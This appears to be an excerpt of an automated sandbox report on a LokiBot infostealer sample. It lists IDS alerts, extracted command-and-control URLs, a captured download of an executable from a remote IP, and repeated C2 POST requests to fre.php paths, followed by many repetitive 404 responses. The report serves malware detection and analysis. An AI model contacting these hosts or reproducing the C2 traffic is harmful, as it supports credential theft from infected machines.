              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 104.21.49.244:80
              Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox View IP Address: 198.46.132.195 198.46.132.195
              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 10 Feb 2022 09:21:50 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Thu, 10 Feb 2022 03:31:37 GMT ETag: "480d4-5d7a1966fd8a9" Accept-Ranges: bytes Content-Length: 295124 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
              Source: global traffic HTTP traffic detected: GET /windowSSH/.win32.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.46.132.195 Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: asiaoil.bar Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 579BFA72 Content-Length: 176 Connection: close
              Source: global traffic HTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: asiaoil.bar Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 579BFA72 Content-Length: 149 Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:21:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B14QjzK93WN7FMCRwgPdBoL4GvyuLTCNzn128gIE66EmvAljQdFfNPOn5qPxQ8nApBsPYHTSjURn1ssUf9vIO%2F1OL2%2BdI5plkWkZzNc4H79V9rsVWKoyCfjhFO%2FkqQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4453c8e679137-FRAData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYIeoMifwVUCSlJ5xQ%2FPPGpv3kxeM8Le4fFZcBSBNQE%2F00nQuzz6hHD2E4yzDxCDvC4GoHGHI7XDrLhEy10sRiqxImrim07qG7zifuLYaSXjE11cVB6vD4NlHq2qFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4454fc86b917d-FRAData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lb9okY1H6vGjyVC1u7%2FrtI1IlQS%2BFDAUyP1p%2FRqqpdW3oHWuKdkbXEj1FlsGoYPfJTBdMWMce2JdGAcisXgmjvWPRjePl3xI2oQ%2BLjS4JVazUAB%2FtUVsenR8M%2BuUug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44555fbc890ee-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6CwJYTVGa3AnJcsAqL3zNlmjIgfexUkjM4cyDshIwsGRdfYIgN3bflXQh2onteNJ926X8WPY94crt1e3EfkgcxXiKtHHMa5TzW7hc2Hyll4xmtK3kqtsPyKPeb2HQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445e4bcca91ed-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFC3rc2PYyOGWitcWjhM03gTv0UwrpD%2FeLJzaq90%2BkjJJnsYFLs3%2B9G23tgPe1ch9t2Z3Xrks%2BoXkXgsLvtmsDrXa8JBOdIJfr6DqInywGS59STYxucek4Q2WmLQpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445eb1e9f9189-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD7gJsujl0qEAxulzRwvTC2Sbt%2Bi4TFWvsjpt5CDloaVfn3Dt69l4iJM31MUngIv0nBezN298VraYSCFYdNpO%2FbJ4t7%2BWNOgx7HdyUwSUfBLC4eOt4PcY93RnkUHlQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445f3db6a5b3e-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvu1d3Vbzy6ZrTPTFWBGN7iEn1tx2RtWGRh2C76Vr5y%2B0NzzM1MCSCMy1A4AVEtbLBuKmRIr5zzqHNenni2AJ%2BwOtJJ179UjFozvWTm5cwFRvpN7D1tfeYfx%2FVlSLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db445fe9dc491ed-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7e4ivEN%2FfJbqg0IR30Nk7YLjE6R7gK9YQJH1DfEk3kbRoonUj0tMEraY%2BRjwLn7cP%2BNl78SF30VWW7AmBXj15TgGfudTHrRaK3bi%2FP7OjjFNWbyUKgOHiQu4SXY%2FXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446054d3a9274-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WPprCDT9p343%2B%2BVa2BjaOyqYMB95UNCR5Ua%2FE%2FsZWRzD2F%2FUvoXHTkn2yAiBthKWkFusxeyRDME7Rpcj9nFv2dMiYrPffSB1GdxIUmMvBnBIuGG6eMWuphVFNIVyRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4460bfe8a9168-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wShLmzxohhsviCUMQ%2FlqpiKLuE1FOqvf4YebS5qugs3Dzn05nwu27HDgM4qgHb10Sommq5Eo%2FITERtrckpOYW58EIm11S3Cxr5FX3Wb1wYzMe0KX2DB0%2FCIuyrBw%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4461298c49180-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uRm6cbs7qjH2NOHh2tOKIkP%2BdzbOwZXOMBEJgE3gb2LRZ5T9DoyDbWgSAgyAW9SjYweFy2OcxyEn%2BT93qxg4gzWWmZP%2Bi0t5VxRBmaJZLw%2FLRVoZMESNjhIGteoHMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4461928579004-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xrOr1KSQmX9JZILB3weUMlW6l%2F0jQY3ebDX3HclhX28Mcc%2FxH30ewiGA0h%2B6cIBx8JHVt3F2yuoloaiZkYlnrBJGiKNxRH6q72FSDnO4vOtUB%2F3%2FUP0EEMJM1AusYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4461f7a6a9079-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RG%2BfeuYDl%2BqDfIJiQqO%2F%2BvdeX%2FsqQOMNdYojKtTw1E0TmD5kZfpZ7nDimmccAbecgCEw4KhPek%2BrNtGEwSzq0DOsMtNFWpBsI22TENldaFbPIU5b5CTiuxOP6VQaaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446260fb19019-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8i3MYQHtfXVP%2F0fASkC1TmdLbF6CiAiraD%2FH44NC0ykl97qHV9jn8MkbKPqY5BdlYRn49S%2F8lYCjj%2FQu3cIXkHTHLxiFgznNR4%2Bp6Kgrrg52L092%2FlGqFymsCMGR0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4462c9e3791fc-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8IzBsU9ezcfTcYipeA3VQtk7w40pxZ5hjlcKQvqw49ojoP1nGh40I6q6Dyh76z4LCC%2BA20%2Fsg0VifVwdOdSi33A6OvrYN65%2FpXFFW%2FSM0mozc%2B4piSK803pIJT8SEw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446333d2791ff-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9t3R%2F4b%2BnD1kTHMJA2ZVHrmeMMJ3Bd02VhJ1WPbcEvJly%2BkAhl4QMrCDxePymIvRWvfDOjaPHdcP0k0kjEFpUPsz22Xy7Rg%2F6wzikwLkWIzwoyWJkUL5tvQWI96tAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4463aab43920b-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U73XLOsc6Oe9yZY%2B47E4Oe8aR4QjbykbQwVxWcy4AoCZmzTRfSc4KodkgvxCsNphdTrX0C20cDMAGUY1y%2Fzw8iNzNLGyI2dqsO%2B6Mc%2FCxzGZVmVZz0bSOwNj1s7QeA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446410864918f-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gufXVp6viiLfqUVAIhTCHjYJOWCjHt2MTTOHWp5%2BFhyL3M%2BbMbx%2BVMYETZElkIaZ%2FIvrsDt5jDpyZjmMZ9o2O%2FwcV9pRsZqOTc1AF0p2Ib213bW35V6pz00NvcCpPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44647eb7b693a-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yKL07jfvs%2BVU4LY4v4Lf0ZGlr%2FIQtMwEPs3bXhHAZspcC%2BNoewD0Rp%2Bye%2FUTm0R72TSKjFoKvNaY7JUUOQLFHqLgLo%2BRTvtpResbSpFvDqoGUIkATecZSSRbWV5rqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4464e3d16912a-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEpekNteQXIJDJauaElbNeLCz0rJIFKhZ7g570xBDVwmYpo12zP6dtthdwoFyYhQ53RMVLKxNG0u7RjPVwRtZkMkV1Qw90wv9Z0CU6vQQlTHweFh1xgcsARiAUxjiQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44654bfd79199-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgBF41clmh4ryuHtU9aOlwd5HEGXjVWqgWBKt0N2O3lBaHqKVGyePCSnXUW7Z%2B9ZswG3zzpAggxRL3OI9PhK3b7diqp15dvDHTlhkQ9V7NyyEid0hjMzsNR7GBdvGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4465b4f709186-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIeTn8QUGJ4PzoL3khYwIjL17%2BBJiTqpZBu%2Bn6l1sSUiSmu%2FH0zc5lyfpLKOHy9tsuu9Y%2F%2BH47s3hpg5DfFC4zroN87eErlds3zDKfV6u79W6o1WqB%2F6UGbnxHqWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446621d638fc5-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6LETH6p%2BXICZC%2BrIHSRQApAEV%2Bdr0iLIW7rBeA%2Fr7Hi4%2Fpf1OlVs9AUjZdSrzw3XtXmW7vu3g0lnMlRgI0IK52z10KSNGVwmWG%2FAp9wtB9EgWL0CS5tO1Mwb6FiG8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446686e9b6945-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M4V5E6ygM8Zq2gQc6SjFi%2FduljsFbImOHJ2nmf7IuPxW2RhXkT%2B0BhOAD5WjYjJ5QxUVoGAUnhyaY3n4fiulEfle%2F5%2F3JKoNA8quALyniLNaaaxsFzuwruQ92V8j%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4466f4f5c92a2-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sfchENBNL5Aam3jQilD1C%2BA7X%2BWklnynb2xLSVS2hPjR0y3qmNn6hmUtwb8IQB8oZoMl23JHAHV2q0I12pykgsoVoLNPvb6k5VdZyObk9ltGFYeKlP7GBpYhUI6%2BpA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44675ef0390ee-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Tlu5Y7AoBorQeMU0%2B32D%2BTFyCDvUY1OQkVB8rypJEdhrQ%2Fenzeu1n%2FT9n9uSqWWX9J%2BfmRJVbTKpt0De%2B5ne1ly1J723TtCWodVcJOhHfjabsPPmaz0oqCOHEICNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4467d0fb492c5-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqldRdslDF9crV%2Bk4ngGcH%2B5VotqLHwZM1hgM1UlLzVHOK203cYnXP5jYPCyykRHqAUueXlxKMSBzyNAjlM%2Fvqw8Nwi0ss%2FzYQhSE9EUH9wjaK0hKyn3kcN4463E9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446836b79922b-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBS7%2BxqKYn8UXFWYtCxhAQUq3wICMu07YMkjyXgzMiD7WnMo34wuo3JBZQt3f%2FvhAz73H9wPdN018HSvgXnDpUBiOvoVzzkvgWsPGM8s4%2F62axP9o7SVvlxiAsFAoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4468a3cbe8fc8-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K0AcT1bifDuMhi7ufsGdy3ZWrMEsl7Ml0%2BBsoYKk1Le07SGb1K3vfiYvudRQACEJNwZd7L%2BjjiNvFHdUhY8ZVQ%2FCWgWD2crnmZAbKNk%2BQ47TcQ8b%2FoLYdTuy2B3gQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44690dd409094-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
